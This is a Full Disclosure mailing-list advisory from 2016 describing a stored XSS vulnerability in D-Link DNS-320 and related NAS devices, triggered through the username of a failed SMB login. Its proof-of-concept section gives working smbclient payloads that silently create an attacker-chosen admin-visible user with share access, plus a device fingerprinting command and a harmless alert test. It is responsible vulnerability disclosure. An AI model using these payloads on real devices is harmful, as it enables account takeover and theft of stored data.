| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 2 Aug 2016 17:58:14 +0200
From: Benjamin Daniel Mussler <sec@...fl7.de>
To: bugtraq@...urityfocus.com, fulldisclosure@...lists.org
Subject: [FD] D-Link NAS, DNS Series: Stored XSS via Unauthenticated SMB
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
D-Link NAS, DNS Series: Stored XSS via Unauthenticated SMB
<http://b.fl7.de/2016/08/d-link-nas-dns-xss-via-smb.html>
1. Affected Models/Versions
2. Summary
3. Technical Summary
4. Vulnerability Details
5. Exploitation / Proof of Concept
6. Timeline
7. See Also
########## 1. Affected Models/Versions ##########
The vulnerability was initially discovered on a **D-Link DNS-320 rev A**
device running **firmware version 2.05b8** (also known as:
"2.13.0507.2014"). The remainder of this advisory describes and
demonstrates the vulnerability based on this exact model and version.
However, according to D-Link **the following models are also
vulnerable**. The version numbers and dates listed below indicate the
firmware version current at the time D-Link confirmed these devices to
be vulnerable.
| Device / Model | FW Version | FW Date |
| ---------------- | :---------: | ---------: |
| DNS-320 rev A | 2.05b8 | 28/07/2014 |
| DNS-320 rev B | 1.02 | 02/07/2014 |
| DNS-320L | 1.06b03 | 28/07/2015 |
| DNS-325 | 1.05b3 | 02/07/2014 |
| DNS-327L | 1.06b02 | 02/09/2014 |
| DNS-340L | 1.04b01 | 11/02/2016 |
| DNS-345 | 1.04b2 | 17/12/2014 |
Both earlier and later versions may be affected as well.
########## 2. Summary ##########
The D-Link DNS-320 is a Network Storage Enclosure
(<http://sharecenter.dlink.com/products/DNS-320> /
<http://www.dlink.com/uk/en/support/product/dns-320-2-bay-sharecenter-network-storage-enclosure>).
The device allows users to access stored data via SMB and it can be
configured through a web interface.
This web interface is vulnerable to Stored Cross-Site Scripting, with
the injection point being the username of an **unsuccessful** SMB login
attempt.
The vulnerability can be used to read and write settings accessible
through the web interface. Ultimately, an attacker may gain full read
and write access to the data stored on the device.
########## 3. Technical Summary ##########
The device's administrative web interface contains a **Stored Cross-Site
Scripting vulnerability, exploitable through an unauthenticated SMB
login attempt (445/tcp)**. The injected code is executed when the victim
logs into the administrative web interface.
Unlike reflected XSS vulnerabilities, it does not require the victim to
open an attacker-supplied link or to visit a malicious web page.
This is one of the relatively few XSS vulnerabilities where malicious
code can be injected despite having neither direct nor indirect access
to the vulnerable web application. As such, it can be exploited even
when access to ports 80/tcp (HTTP) and 443/tcp (HTTPS) is denied.
########## 4. Vulnerability Details ##########
The device keeps a record of unsuccessful SMB login attempts in a log
file. For login attempts with a non-existing username, this username
will be stored and later displayed without being sanitized. The contents
of the log file can be viewed from within the device's web interface;
either on a dedicated page (Management -> System Management -> Logs;
```<http://<IP>/web/management.html?id=log>```) or on the home page
```<http://<IP>/web/home.html>```. Both pages suffer from the same
vulnerability, but because the home page is automatically loaded after a
successful login, injected code will be run immediately afterwards and
without further user interaction.
########## 5. Exploitation / Proof of Concept ##########
The following two ```smbclient``` commands serve as a proof of concept.
Their purpose is to inject code that will create a new user with a
password chosen by the attacker. In addition, it supplies this user with
read/write permissions on the device's default share ("Volume_1");
which, by default, results in full read and write access to the data
stored on the primary HDD.
smbclient -U '<img src=/cgi-bin/account_mgr.cgi?cmd=cgi_adduser_to_session&s_name=Volume_1&ftp=true&read_list=&write_list=baduser&decline_list=&username=baduser&>' -N '\\x\Volume_1' -I <TARGET IP>
smbclient -U '<img src=/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=baduser&pw=badpass&>' -N '\\x\Volume_1' -I <TARGET IP>
Once an administrator logs into the device's web interface, the code
will be executed: a new user with an attacker-specified password will be
created and granted read/write permissions to the "Volume_1" share.
To confirm whether a device is one of the vulnerable models,
```rpcclient``` can be used. After issuing the ```querydominfo```
command, the model name can be found next to ```Comment```:
[~] $ rpcclient -U "" -N <TARGET IP>
rpcclient $> querydominfo
Domain: WORKGROUP
Server: DLINK-EXXXXX
Comment: DNS-320 <===== Model
Total Users: 3
[...]
### Alternative, less intrusive PoC
Some readers may want to verify whether the vulnerability exists on
their device, but without making configuration changes, such as the ones
caused by the previously mentioned commands.
In these cases, the following command may be used:
smbclient -U 'a<img src=x onerror=eval("alert(String.fromCharCode(88,83,83,64)+document.domain)")>b' -N '\\x\Volume' -I <TARGET IP>
If the device is indeed vulnerable, the user will be greeted with an
"XSS" popup window the next time s/he logs into the device's web
interface: <http://b.fl7.de/images/2016-dlink.png>
########## 6. Timeline ##########
2016-01-11: Attempted to report vulnerability to D-Link via web form <<http://support.dlink.com/ReportVulnerabilities.aspx>.
2016-01-21: (Ten days later: still no response.)
2016-01-21: Contacted <security@...nk.com> (following Security Event Response Policy <ftp://ftp2.dlink.com/SECURITY%20ADVISEMENTS/SVPolicy-021114-2.PDF>).
2016-01-21: D-Link responds within a few minutes.
**2016-01-22: Vulnerability report sent.**
2016-01-26: D-Link confirms vulnerability.
2016-02-11: CVE-ID requested from MITRE via <cve-assign@...re.org>.
2016-02-12: MITRE rejects request.
**2016-02-27: D-Link provides preview of updated firmware to verify fix.**
**2016-03-01: Firmware reviewed, confirmation sent to D-Link.**
2016-06-08: Asked D-Link for status update.
2016-07-08: (One month later: still no response.)
2016-07-08: Asked D-Link for status update.
2016-07-13: D-Link states some firmware updates have been posted in "forums", remaining updates to be released "by the end of this week. 7/15".
2016-07-19: Asked D-Link for direct links to said updates.
2016-08-02: (Two weeks later: still no response.)
**2016-08-02: Advisory published.**
########## 7. See Also ##########
D-Link UK product pages of the affected devices:
* DNS-320 rev A
<http://www.dlink.com/uk/en/support/product/dns-320-2-bay-sharecenter-network-storage-enclosure?revision=deu_reva#downloads>
* DNS-320 rev B
<http://www.dlink.com/uk/en/support/product/dns-320-2-bay-sharecenter-network-storage-enclosure?revision=deu_revb#downloads>
* DNS-320L
<http://www.dlink.com/uk/en/home-solutions/share/network-attached-storage/dns-320l-sharecenter-2-bay-cloud-storage-enclosure>
* DNS-325
<http://www.dlink.com/uk/en/support/product/dns-325-sharecenter-2-bay-network-storage-enclosure>
* DNS-327L
<http://www.dlink.com/uk/en/home-solutions/share/network-attached-storage/dns-327l-2-bay-network-attached-storage>
* DNS-340L
<http://www.dlink.com/uk/en/home-solutions/share/network-attached-storage/dns-340l-sharecenter-4-bay-cloud-network-storage-enclosure>
* DNS-345
<http://www.dlink.com/uk/en/support/product/dns-345-sharecenter-4-bay-cloud-storage-4000>
Product pages for other regions may contain different firmware versions.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2
iQIcBAEBCAAGBQJXoMJzAAoJEAg0a3ng3v4fDHQQAI8LcvUan2ItQHkha8uUmiwW
1niFKy0qeqhPORowLYC8e0Ek1Pd315BnkJIFaECXxIW4PIBeEUMv/xogucUvEL6R
MmxXTTGXHS4R96PbuRuf0ZWTGbFGc6VzWTiBRvFDNkjiRAccORbGUBnayoKGE0So
EG9vzXnao/SQTwLvO6BoIFk+KEMdKhO6uQdMpobV95wb7SwZSg0+abEEZnVyY4BY
BjSnghQfL9KDAoMtEaDx0fPk9KWnBgreOHUW4gPN+LjzBfvjIwFgkIJod84k0ThR
daxv6Zi5xWubztvnIBtF5iZ7j7IVYTIiQcrGts3cJq3acCVdeJy+3YcOOHNkELbM
qQOQmW/AdNDO9gl8l372ZWrQ/xXflQBZk4OIkiySlVqEA0TqfAe4w/f1E51E0OkL
FVc8BkQrSrx+RjvVM3Zf9KQzYio4deh9SGNl3WXHMI7JTaOA+20BG8oDEGZS1OIF
CDKe8VrM+MUfiLau/ZVmVRmT8ieOqYGU7OyEFB+nToKhA3c05r15GgBi50nUYUsm
eKNMBJPfCTn0h8KA9WZM7ZGFRD1PVqTCAuIjt1ei+VdU7M/PacgMzITpqqQ80BJO
aTJK+/70YaRt0A3BxcqaTbuZ/PaZ2SupQcgwnauJa/vJzawuxAu7qtY2oJX02pNo
vYMdp+jbizlBkEyCIvld
=lfyi
-----END PGP SIGNATURE-----
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists